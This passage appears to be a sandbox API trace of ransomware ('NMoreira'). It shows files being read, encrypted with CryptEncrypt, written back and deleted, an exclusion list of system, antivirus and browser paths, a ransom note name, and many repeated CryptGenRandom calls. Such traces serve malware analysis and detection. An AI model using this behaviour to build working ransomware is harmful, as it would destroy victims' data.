lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.278] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.278] GetLastError () returned 0x0 [0153.279] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.279] GetLastError () returned 0x0 [0153.279] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.279] GetLastError () returned 0x0 [0153.279] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.279] GetLastError () returned 0x0 [0153.279] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0153.279] GetLastError () returned 0x0 [0153.279] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0153.279] ReadFile (in: hFile=0x1624, lpBuffer=0x2901230, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0153.279] WriteFile (in: hFile=0x588, lpBuffer=0x2901230*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2901230*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0153.279] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui")) returned 0x20 [0153.280] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui", dwFileAttributes=0x20) returned 0 [0153.280] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 1 [0153.280] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui")) returned 0 [0153.280] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" [0153.280] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0153.280] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC9CC.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc9cc.tmp")) returned 0xc9cc [0153.281] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC9CC.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc9cc.tmp"), dwFlags=0x1) returned 0 [0153.281] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC9CC.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc9cc.tmp")) returned 1 [0153.281] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0153.281] wcslen (_String="OK") returned 0x2 [0153.281] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.281] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.281] CryptDestroyKey (hKey=0x9ad678) returned 1 [0153.281] CryptDestroyHash (hHash=0x9ad7b8) returned 1 [0153.281] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0153.281] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0153.281] PathMatchSpecW (pszFile="split.avi", pszSpec="*NMCRYPT") returned 0 [0153.281] PathMatchSpecW (pszFile="split.avi", pszSpec="*Recovers your files.html") returned 0 [0153.281] PathMatchSpecW (pszFile="split.avi", pszSpec="*.exe") returned 0 [0153.281] PathMatchSpecW (pszFile="split.avi", pszSpec="*.dll") returned 0 [0153.281] PathMatchSpecW (pszFile="split.avi", pszSpec="*.lnk") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*.bat") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*.ini") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*.msi") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*.scf") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*pagefile.sys*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*NTUSER.DAT*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*AppData*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*\\winrar\\*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*\\Internet Explorer\\*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*\\java\\*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*\\TeamViewer\\*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*\\windows\\*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*\\ESET\\*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*\\AVG\\*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*\\AVIRA\\*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*\\AVAST Software\\*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*Atheros*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*Realtek*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*bootmgr*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*boot*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*boot*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*CONFIG.SYS*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*IO.SYS*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*MSDOS.SYS*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*NTDETECT.COM*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*ntldr*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*chrome*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*opera*") returned 0 [0153.282] PathMatchSpecW (pszFile="split.avi", pszSpec="*firefox*") returned 0 [0153.282] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi", pszSpec="*") returned 1 [0153.282] strlen (_Str="NMoreira") returned 0x8 [0153.282] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.285] 